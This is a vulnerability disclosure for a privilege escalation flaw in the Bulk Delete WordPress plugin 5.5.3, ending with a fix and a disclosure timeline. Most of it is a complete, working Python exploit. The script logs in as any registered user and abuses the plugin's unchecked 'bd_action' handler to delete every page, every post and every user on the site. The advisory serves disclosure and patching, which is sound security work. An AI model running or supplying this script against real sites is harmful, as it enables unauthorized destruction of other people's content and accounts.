* Exploit Title: Bulk Delete [Privilege Escalation] * Discovery Date: 2016-02-10 * Exploit Author: Panagiotis Vagenas * Author Link: https://twitter.com/panVagenas * Vendor Homepage: http://bulkwp.com/ * Software Link: https://wordpress.org/plugins/bulk-delete/ * Version: 5.5.3 * Tested on: WordPress 4.4.2 * Category: WebApps, WordPress Description ----------- _Bulk Delete_ plugin for WordPress suffers from a privilege escalation vulnerability. Any registered user can exploit the lack of capabilities checks to perform all administrative tasks provided by the _Bulk Delete_ plugin. Some of these actions, but not all, are: - `bd_delete_pages_by_status`: deletes all pages by status - `bd_delete_posts_by_post_type`: deletes all posts by type - `bd_delete_users_by_meta`: delete all users with a specific pair of meta name, meta value Nearly all actions registered by this plugin can be performed from any user, as long as they passed to a query var named `bd_action` and the user has a valid account. These actions would normally require administrative wrights, so we can consider this as a privilege escalation vulnerability. PoC --- The following script will delete all pages, posts and users from the infected website. ``` #!/usr/bin/python3 ######################################################################## ######## # Bulk Delete Privilege Escalation Exploit # # **IMPORTANT** Don't use this in a production site, if vulnerable it wi ll # delete nearly all your sites content # # Author: Panagiotis Vagenas ######################################################################## ######## import requests loginUrl = 'http://example.com/wp-login.php' adminUrl = 'http://example.com/wp-admin/index.php' loginPostData = { 'log': 'username', 'pwd': 'password', 'rememberme': 'forever', 'wp-submit': 'Log+In' } l = requests.post(loginUrl, data=loginPostData) if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0: print("Couldn't acquire a valid session") exit(1) loggedInCookies = l.history[0].cookies def do_action(action, data): try: requests.post( adminUrl + '?bd_action=' + action, data=data, cookies=loggedInCookies, timeout=30 ) except TimeoutError: print('Action ' + action + ' timed out') else: print('Action ' + action + ' performed') print('Deleting all pages') do_action( 'delete_pages_by_status', { 'smbd_pages_force_delete': 'true', 'smbd_published_pages': 'published_pages', 'smbd_draft_pages': 'draft_pages', 'smbd_pending_pages': 'pending_pages', 'smbd_future_pages': 'future_pages', 'smbd_private_pages': 'private_pages', } ) print('Deleting all posts from all default post types') do_action('delete_posts_by_post_type', {'smbd_types[]': [ 'post', 'page', 'attachment', 'revision', 'nav_menu_item' ]}) print('Deleting all users') do_action( 'delete_users_by_meta', { 'smbd_u_meta_key': 'nickname', 'smbd_u_meta_compare': 'LIKE', 'smbd_u_meta_value': '', } ) exit(0) ``` Solution -------- Upgrade to v5.5.4 Timeline -------- 1. **2016-02-10**: Requested CVE ID 2. **2016-02-10**: Vendor notified through wordpress.org support forums 3. **2016-02-10**: Vendor notified through the contact form at bulkwp.co m 4. **2016-02-10**: Vendor responded and received details about the issue 5. **2016-02-10**: Vendor verified vulnerability 6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue